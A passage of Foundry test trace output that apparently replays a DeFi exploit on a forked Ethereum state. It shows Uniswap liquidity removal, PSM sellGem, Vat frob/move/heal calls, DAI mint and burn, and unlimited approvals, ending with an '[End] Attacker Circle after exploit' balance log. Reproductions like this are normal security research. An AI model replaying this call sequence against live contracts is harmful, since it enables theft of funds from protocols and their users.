    │   │   │   ├─ [2602] 0x6B175474E89094C44Da98b954EedeAC495271d0F::balanceOf(0xAE461cA67B15dc8dc81CE7615e0320dA1A9aB8D5) [staticcall]
    │   │   │   │   └─ ← [Return] 94939306472792823527877871 [9.493e25]
    │   │   │   ├─ [3315] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(0xAE461cA67B15dc8dc81CE7615e0320dA1A9aB8D5) [staticcall]
    │   │   │   │   ├─ [2529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0xAE461cA67B15dc8dc81CE7615e0320dA1A9aB8D5) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 94856454863365 [9.485e13]
    │   │   │   │   └─ ← [Return] 94856454863365 [9.485e13]
    │   │   │   ├─ [2314] 0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f::feeTo() [staticcall]
    │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000
    │   │   │   ├─ emit Transfer(from: 0xAE461cA67B15dc8dc81CE7615e0320dA1A9aB8D5, to: 0x0000000000000000000000000000000000000000, value: 1104761777152681125 [1.104e18])
    │   │   │   ├─ [26174] 0x6B175474E89094C44Da98b954EedeAC495271d0F::transfer(Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1244787873607819516539388 [1.244e24])
    │   │   │   │   ├─ emit Transfer(from: 0xAE461cA67B15dc8dc81CE7615e0320dA1A9aB8D5, to: Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1244787873607819516539388 [1.244e24])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x6e10ff27cae71a13525bd61167857e5c982b4674c8e654900e4e9d5035811f78: 0 → 0x00000000000000000000000000000000000000000001079815f9c580553571fc
    │   │   │   │   │   @ 0xb4df4155309577195913125d912b3c438ee669e0fe73ccb3b315daa02d87695c: 0x0000000000000000000000000000000000000000004e882e1dd9b9583323acef → 0x0000000000000000000000000000000000000000004d809607dff3d7ddee3af3
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [33517] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::transfer(Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1243701572448 [1.243e12])
    │   │   │   │   ├─ [32728] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::transfer(Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1243701572448 [1.243e12]) [delegatecall]
    │   │   │   │   │   ├─ emit Transfer(from: 0xAE461cA67B15dc8dc81CE7615e0320dA1A9aB8D5, to: Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1243701572448 [1.243e12])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0 → 0x000000000000000000000000000000000000000000000000000001219263f360
    │   │   │   │   │   │   @ 0x42a5d62dddf4ceaa8fa2a080ff2095a3322c1c98a9b38b2ec2c59587732396e3: 0x000000000000000000000000000000000000000000000000000056457d4bfa05 → 0x00000000000000000000000000000000000000000000000000005523eae806a5
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [602] 0x6B175474E89094C44Da98b954EedeAC495271d0F::balanceOf(0xAE461cA67B15dc8dc81CE7615e0320dA1A9aB8D5) [staticcall]
    │   │   │   │   └─ ← [Return] 93694518599185004011338483 [9.369e25]
    │   │   │   ├─ [1315] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(0xAE461cA67B15dc8dc81CE7615e0320dA1A9aB8D5) [staticcall]
    │   │   │   │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0xAE461cA67B15dc8dc81CE7615e0320dA1A9aB8D5) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 93612753290917 [9.361e13]
    │   │   │   │   └─ ← [Return] 93612753290917 [9.361e13]
    │   │   │   ├─ emit Sync(reserve0: 93694518599185004011338483 [9.369e25], reserve1: 93612753290917 [9.361e13])
    │   │   │   ├─ emit Burn(sender: Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0: 1244787873607819516539388 [1.244e24], amount1: 1243701572448 [1.243e12], to: Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 9: 0x0000000000000000000000000000000000000004a982ec74eb6226126703a823 → 0x0000000000000000000000000000000000000004a985ca4a1e38affceb67866b
    │   │   │   │   @ 10: 0x00000000000000000003d5fa71a316f9276b76f656cac9ec66ccdc37518a6e2f → 0x00000000000000000003d5fcd1b5ce906113174761835618244429b11493930f
    │   │   │   │   @ 0: 0x000000000000000000000000000000000000000000000004915633767a1afb8c → 0x00000000000000000000000000000000000000000000000482014c7ad17d96e7
    │   │   │   │   @ 8: 0x62f71758000000000000000056457d4bfa050000004e882e1dd9b9583323acef → 0x62f719f400000000000000005523eae806a50000004d809607dff3d7ddee3af3
    │   │   │   │   @ 0xcd8e9071a8d839ad089c7f246e7822483edcf59cdf4c36cfaeaff256f12de51d: 0x0000000000000000000000000000000000000000000000000f54e6fba89d64a5 → 0
    │   │   │   └─ ← [Return] 1244787873607819516539388 [1.244e24], 1243701572448 [1.243e12]
    │   │   ├─ [27867] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::approve(0x0A59649758aa4d66E25f08Dd01271e891fe52199, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ [27078] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::approve(0x0A59649758aa4d66E25f08Dd01271e891fe52199, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]) [delegatecall]
    │   │   │   │   ├─ emit Approval(owner: Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x0A59649758aa4d66E25f08Dd01271e891fe52199, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x7de21aa8d06514b8995fa26a20e568b59c7b2422f0bb8905587c84689f29a72a: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Return] true
    │   │   ├─ [157500] 0x89B78CfA322F6C5dE0aBcEecab66Aee45393cC5A::sellGem(Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1193139061611 [1.193e12])
    │   │   │   ├─ [58980] 0x0A59649758aa4d66E25f08Dd01271e891fe52199::join(0x89B78CfA322F6C5dE0aBcEecab66Aee45393cC5A, 1193139061611 [1.193e12], Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─ [29484] 0x35D1b3F3D7966A1DFe207aa4514C12a259A0492B::slip(0x50534d2d555344432d4100000000000000000000000000000000000000000000, 0x89B78CfA322F6C5dE0aBcEecab66Aee45393cC5A, 1193139061611000000000000 [1.193e24])
    │   │   │   │   │   ├─  emit topic 0: 0x7cdd3fde00000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │        topic 1: 0x50534d2d555344432d4100000000000000000000000000000000000000000000
    │   │   │   │   │   │        topic 2: 0x00000000000000000000000089b78cfa322f6c5de0abceecab66aee45393cc5a
    │   │   │   │   │   │        topic 3: 0x00000000000000000000000000000000000000000000fca832b8e587242db000
    │   │   │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000e07cdd3fde50534d2d555344432d410000000000000000000000000000000000000000000000000000000000000000000089b78cfa322f6c5de0abceecab66aee45393cc5a00000000000000000000000000000000000000000000fca832b8e587242db00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x3f3c2ecb65cd96a97fcddec52c0884cdf301cfb16464b3745f0f8a91f74c37fe: 0 → 0x00000000000000000000000000000000000000000000fca832b8e587242db000
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [10792] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::transferFrom(Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x0A59649758aa4d66E25f08Dd01271e891fe52199, 1193139061611 [1.193e12])
    │   │   │   │   │   ├─ [9997] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::transferFrom(Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x0A59649758aa4d66E25f08Dd01271e891fe52199, 1193139061611 [1.193e12]) [delegatecall]
    │   │   │   │   │   │   ├─ emit Transfer(from: Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0A59649758aa4d66E25f08Dd01271e891fe52199, value: 1193139061611 [1.193e12])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x46dfd278e337569e7349a53686f83d88045875031775d7e74e2fa6219c26c4e7: 0x000000000000000000000000000000000000000000000000000c67069c95a0a3 → 0x000000000000000000000000000000000000000000000000000c681c6936e40e
    │   │   │   │   │   │   │   @ 0x7de21aa8d06514b8995fa26a20e568b59c7b2422f0bb8905587c84689f29a72a: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffeea335ebc94
    │   │   │   │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0x000000000000000000000000000000000000000000000000000001219263f360 → 0x0000000000000000000000000000000000000000000000000000000bc5c2aff5
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─  emit topic 0: 0xd14b1e4b00000000000000000000000000000000000000000000000000000000
    │   │   │   │   │        topic 1: 0x00000000000000000000000089b78cfa322f6c5de0abceecab66aee45393cc5a
    │   │   │   │   │        topic 2: 0x00000000000000000000000089b78cfa322f6c5de0abceecab66aee45393cc5a
    │   │   │   │   │        topic 3: 0x00000000000000000000000000000000000000000000000000000115cca1436b
    │   │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000e0d14b1e4b00000000000000000000000089b78cfa322f6c5de0abceecab66aee45393cc5a00000000000000000000000000000000000000000000000000000115cca1436b0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e149600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [58757] 0x35D1b3F3D7966A1DFe207aa4514C12a259A0492B::frob(0x50534d2d555344432d4100000000000000000000000000000000000000000000, 0x89B78CfA322F6C5dE0aBcEecab66Aee45393cC5A, 0x89B78CfA322F6C5dE0aBcEecab66Aee45393cC5A, 0x89B78CfA322F6C5dE0aBcEecab66Aee45393cC5A, 1193139061611000000000000 [1.193e24], 1193139061611000000000000 [1.193e24])
    │   │   │   │   ├─  emit topic 0: 0x7608870300000000000000000000000000000000000000000000000000000000
    │   │   │   │   │        topic 1: 0x50534d2d555344432d4100000000000000000000000000000000000000000000
    │   │   │   │   │        topic 2: 0x00000000000000000000000089b78cfa322f6c5de0abceecab66aee45393cc5a
    │   │   │   │   │        topic 3: 0x00000000000000000000000089b78cfa322f6c5de0abceecab66aee45393cc5a
    │   │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000e07608870350534d2d555344432d410000000000000000000000000000000000000000000000000000000000000000000089b78cfa322f6c5de0abceecab66aee45393cc5a00000000000000000000000089b78cfa322f6c5de0abceecab66aee45393cc5a00000000000000000000000089b78cfa322f6c5de0abceecab66aee45393cc5a00000000000000000000000000000000000000000000fca832b8e587242db00000000000000000000000000000000000000000000000fca832b8e587242db00000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x61abb0b80b68fd076aaa5605daeff344d3c81a63b387da415cb592e536c45b37: 0x00000000000000000000000000000000000000000b47ab4e8ef8d2f8df193000 → 0x00000000000000000000000000000000000000000b48a7f6c1b1b8800346e000
    │   │   │   │   │   @ 0x61abb0b80b68fd076aaa5605daeff344d3c81a63b387da415cb592e536c45b38: 0x00000000000000000000000000000000000000000b47ab4e8ef8d2f8df193000 → 0x00000000000000000000000000000000000000000b48a7f6c1b1b8800346e000
    │   │   │   │   │   @ 0xb8070b88b961bc980dd9624dc2940c55d826a6452217b7ccd403c5b1f5086b16: 0x00000000000000000000000000000000000000000b47ab4e8ef8d2f8df193000 → 0x00000000000000000000000000000000000000000b48a7f6c1b1b8800346e000
    │   │   │   │   │   @ 0x3f3c2ecb65cd96a97fcddec52c0884cdf301cfb16464b3745f0f8a91f74c37fe: 0x00000000000000000000000000000000000000000000fca832b8e587242db000 → 0
    │   │   │   │   │   @ 0x26f0445e082c3882ead04069e50a1ce52af236f7d8be02259014accf8948e48a: 0 → 0x00000000000000000000033060fde990d6e0364e71abf334cb7ea78000000000
    │   │   │   │   │   @ 7: 0x0000000000000000004c2f81892469bf374ff8c69a3b355f44244baf02077654 → 0x0000000000000000004c32b1ea2253500e302f150be728940fa2f32f02077654
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [8043] 0x35D1b3F3D7966A1DFe207aa4514C12a259A0492B::move(0x89B78CfA322F6C5dE0aBcEecab66Aee45393cC5A, 0xA950524441892A31ebddF91d3cEEFa04Bf454466, 0)
    │   │   │   │   ├─  emit topic 0: 0xbb35783b00000000000000000000000000000000000000000000000000000000
    │   │   │   │   │        topic 1: 0x00000000000000000000000089b78cfa322f6c5de0abceecab66aee45393cc5a
    │   │   │   │   │        topic 2: 0x000000000000000000000000a950524441892a31ebddf91d3ceefa04bf454466
    │   │   │   │   │        topic 3: 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000e0bb35783b00000000000000000000000089b78cfa322f6c5de0abceecab66aee45393cc5a000000000000000000000000a950524441892a31ebddf91d3ceefa04bf454466000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [22801] 0x9759A6Ac90977b93B58547b4A71c78317f391A28::exit(Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1193139061611000000000000 [1.193e24])
    │   │   │   │   ├─ [10843] 0x35D1b3F3D7966A1DFe207aa4514C12a259A0492B::move(0x89B78CfA322F6C5dE0aBcEecab66Aee45393cC5A, 0x9759A6Ac90977b93B58547b4A71c78317f391A28, 1193139061611000000000000000000000000000000000000000 [1.193e51])
    │   │   │   │   │   ├─  emit topic 0: 0xbb35783b00000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │        topic 1: 0x00000000000000000000000089b78cfa322f6c5de0abceecab66aee45393cc5a
    │   │   │   │   │   │        topic 2: 0x0000000000000000000000009759a6ac90977b93b58547b4a71c78317f391a28
    │   │   │   │   │   │        topic 3: 0x00000000000000000000033060fde990d6e0364e71abf334cb7ea78000000000
    │   │   │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000e0bb35783b00000000000000000000000089b78cfa322f6c5de0abceecab66aee45393cc5a0000000000000000000000009759a6ac90977b93b58547b4a71c78317f391a2800000000000000000000033060fde990d6e0364e71abf334cb7ea7800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x26f0445e082c3882ead04069e50a1ce52af236f7d8be02259014accf8948e48a: 0x00000000000000000000033060fde990d6e0364e71abf334cb7ea78000000000 → 0
    │   │   │   │   │   │   @ 0x7adce341587c7ad28f80a9ef54da0d2f0bfd917b11856be2d246a8c66685b1a0: 0x0000000000000000004763b31013773783d7103bf986fba2fa3900f1c0000000 → 0x0000000000000000004766e3711160c85ab7468a6b32eed7c5b7a871c0000000
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [5945] 0x6B175474E89094C44Da98b954EedeAC495271d0F::mint(Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1193139061611000000000000 [1.193e24])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1193139061611000000000000 [1.193e24])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 1: 0x000000000000000000000000000000000000000016180e164567449bb85e63a6 → 0x000000000000000000000000000000000000000016190abe78202a22dc8c13a6
    │   │   │   │   │   │   @ 0x6e10ff27cae71a13525bd61167857e5c982b4674c8e654900e4e9d5035811f78: 0x00000000000000000000000000000000000000000001079815f9c580553571fc → 0x00000000000000000000000000000000000000000002044048b2ab07796321fc
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─  emit topic 0: 0xef693bed00000000000000000000000000000000000000000000000000000000
    │   │   │   │   │        topic 1: 0x00000000000000000000000089b78cfa322f6c5de0abceecab66aee45393cc5a
    │   │   │   │   │        topic 2: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   │   │        topic 3: 0x00000000000000000000000000000000000000000000fca832b8e587242db000
    │   │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000e0ef693bed0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e149600000000000000000000000000000000000000000000fca832b8e587242db000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x7adce341587c7ad28f80a9ef54da0d2f0bfd917b11856be2d246a8c66685b1a0: 0x0000000000000000004763b31013773783d7103bf986fba2fa3900f1c0000000 → 0x0000000000000000004766e3711160c85ab7468a6b32eed7c5b7a871c0000000
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ emit SellGem(param0: Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 1193139061611 [1.193e12], param2: 0)
    │   │   │   └─ ← [Stop]
    │   │   ├─ [24514] 0x6B175474E89094C44Da98b954EedeAC495271d0F::approve(0x1EB4CF3A948E7D72A198fe073cCb8C7a948cD853, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ emit Approval(owner: Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x1EB4CF3A948E7D72A198fe073cCb8C7a948cD853, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x0e90c182cb4ddecea01078375e4f73a58b70ed32cc2935c64e94e0f5a363e9a9: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 0xcd8e9071a8d839ad089c7f246e7822483edcf59cdf4c36cfaeaff256f12de51d: 0 → 0x0000000000000000000000000000000000000000000000000f54e6fba89d64a5
    │   │   │   @ 12: 0 → 1
    │   │   │   @ 0xdf7dea2811b92629425ed3dfe2dd565333a2fe90d4bcf9ce80117e8eb51e04d9: 0 → 0x00000000000000000000000000000000000000000002044048b2aad40acf7ee4
    │   │   │   @ 0x01609d741d5d482033fe9bbffe1718602984b3ada87e0cf9c7656350e5c157c9: 0x0000000000000000000000000000000000000000009766aea4c000584fba0443 → 0x0000000000000000000000000000000000000000009566680b8631fac3fb230c
    │   │   └─ ← [Return] 0x439148f0bbc682ca079e46d6e2c2f0c1e3b820f1a291b069d8882abf8cf18dd9
    │   ├─ [25718] 0x6B175474E89094C44Da98b954EedeAC495271d0F::transferFrom(Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x1EB4CF3A948E7D72A198fe073cCb8C7a948cD853, 2437926935218598618037988 [2.437e24])
    │   │   ├─ emit Transfer(from: Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x1EB4CF3A948E7D72A198fe073cCb8C7a948cD853, value: 2437926935218598618037988 [2.437e24])
    │   │   ├─  storage changes:
    │   │   │   @ 0x6e10ff27cae71a13525bd61167857e5c982b4674c8e654900e4e9d5035811f78: 0x00000000000000000000000000000000000000000002044048b2ab07796321fc → 0x000000000000000000000000000000000000000000000000000000336e93a318
    │   │   │   @ 0x94ae1f986844a03669a3e23200685912e9b579d6492770fdc08c4dc73b47422b: 0 → 0x00000000000000000000000000000000000000000002044048b2aad40acf7ee4
    │   │   └─ ← [Return] true
    │   ├─ [37336] 0x9759A6Ac90977b93B58547b4A71c78317f391A28::join(0x1EB4CF3A948E7D72A198fe073cCb8C7a948cD853, 2437926935218598618037988 [2.437e24])
    │   │   ├─ [25943] 0x35D1b3F3D7966A1DFe207aa4514C12a259A0492B::move(0x9759A6Ac90977b93B58547b4A71c78317f391A28, 0x1EB4CF3A948E7D72A198fe073cCb8C7a948cD853, 2437926935218598618037988000000000000000000000000000 [2.437e51])
    │   │   │   ├─  emit topic 0: 0xbb35783b00000000000000000000000000000000000000000000000000000000
    │   │   │   │        topic 1: 0x0000000000000000000000009759a6ac90977b93b58547b4a71c78317f391a28
    │   │   │   │        topic 2: 0x0000000000000000000000001eb4cf3a948e7d72a198fe073ccb8c7a948cd853
    │   │   │   │        topic 3: 0x00000000000000000000068418e8a797638e107bdc2657c1271fc86ea0000000
    │   │   │   │           data: 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000e0bb35783b0000000000000000000000009759a6ac90977b93b58547b4a71c78317f391a280000000000000000000000001eb4cf3a948e7d72a198fe073ccb8c7a948cd85300000000000000000000068418e8a797638e107bdc2657c1271fc86ea000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xcbd9d6e89a85a59ad162b4dcca4cf851d6f3567292c19860fa85efaa0fbe4db2: 0 → 0x00000000000000000000068418e8a797638e107bdc2657c1271fc86ea0000000
    │   │   │   │   @ 0x7adce341587c7ad28f80a9ef54da0d2f0bfd917b11856be2d246a8c66685b1a0: 0x0000000000000000004766e3711160c85ab7468a6b32eed7c5b7a871c0000000 → 0x00000000000000000047605f5828b930f729360e8f0c97169e97e00320000000
    │   │   │   └─ ← [Stop]
    │   │   ├─ [5546] 0x6B175474E89094C44Da98b954EedeAC495271d0F::burn(0x1EB4CF3A948E7D72A198fe073cCb8C7a948cD853, 2437926935218598618037988 [2.437e24])
    │   │   │   ├─ emit Transfer(from: 0x1EB4CF3A948E7D72A198fe073cCb8C7a948cD853, to: 0x0000000000000000000000000000000000000000, value: 2437926935218598618037988 [2.437e24])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x94ae1f986844a03669a3e23200685912e9b579d6492770fdc08c4dc73b47422b: 0x00000000000000000000000000000000000000000002044048b2aad40acf7ee4 → 0
    │   │   │   │   @ 1: 0x000000000000000000000000000000000000000016190abe78202a22dc8c13a6 → 0x00000000000000000000000000000000000000001617067e2f6d7f4ed1bc94c2
    │   │   │   └─ ← [Stop]
    │   │   ├─  emit topic 0: 0x3b4da69f00000000000000000000000000000000000000000000000000000000
    │   │   │        topic 1: 0x0000000000000000000000001eb4cf3a948e7d72a198fe073ccb8c7a948cd853
    │   │   │        topic 2: 0x0000000000000000000000001eb4cf3a948e7d72a198fe073ccb8c7a948cd853
    │   │   │        topic 3: 0x00000000000000000000000000000000000000000002044048b2aad40acf7ee4
    │   │   │           data: 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000e03b4da69f0000000000000000000000001eb4cf3a948e7d72a198fe073ccb8c7a948cd85300000000000000000000000000000000000000000002044048b2aad40acf7ee4000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   ├─  storage changes:
    │   │   │   @ 0xcbd9d6e89a85a59ad162b4dcca4cf851d6f3567292c19860fa85efaa0fbe4db2: 0 → 0x00000000000000000000068418e8a797638e107bdc2657c1271fc86ea0000000
    │   │   └─ ← [Stop]
    │   ├─ [6216] 0x35D1b3F3D7966A1DFe207aa4514C12a259A0492B::heal(2437926935218598618037988000000000000000000000000000 [2.437e51])
    │   │   ├─  emit topic 0: 0xf37ac61c00000000000000000000000000000000000000000000000000000000
    │   │   │        topic 1: 0x00000000000000000000068418e8a797638e107bdc2657c1271fc86ea0000000
    │   │   │        topic 2: 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │        topic 3: 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │           data: 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000e0f37ac61c00000000000000000000068418e8a797638e107bdc2657c1271fc86ea00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    │   │   ├─  storage changes:
    │   │   │   @ 0x549e6cf29ba52efb67c58ebab853532d1d7f5a297ef4890715b20495031a6865: 0x00000000000000000000068418e8a797638e107bdc2657c1271fc86ea0000000 → 0
    │   │   │   @ 0xcbd9d6e89a85a59ad162b4dcca4cf851d6f3567292c19860fa85efaa0fbe4db2: 0x00000000000000000000068418e8a797638e107bdc2657c1271fc86ea0000000 → 0
    │   │   │   @ 8: 0x00000000000000000003ea83fdd3a3c4b25b529c9d5db96bddf56b42ef3c1b3a → 0x00000000000000000003e3ffe4eafc2d4ecd4220c13761aab6d5a2d44f3c1b3a
    │   │   │   @ 7: 0x0000000000000000004c32b1ea2253500e302f150be728940fa2f32f02077654 → 0x0000000000000000004c2c2dd139abb8aaa21e992fc0d0d2e8832ac062077654
    │   │   └─ ← [Stop]
    │   └─ ← [Return] true
    ├─ [1315] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(Circle: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 50562510837 [5.056e10]
    │   └─ ← [Return] 50562510837 [5.056e10]
    ├─ emit log_named_decimal_uint(key: "[End] Attacker Circle after exploit", val: 50562510837 [5.056e10], decimals: 6)
    ├─  storage changes:
    │   @ 3: 1 → 0
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 30.16s (28.45s CPU time)

Ran 2 test suites in 30.96s (30.68s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
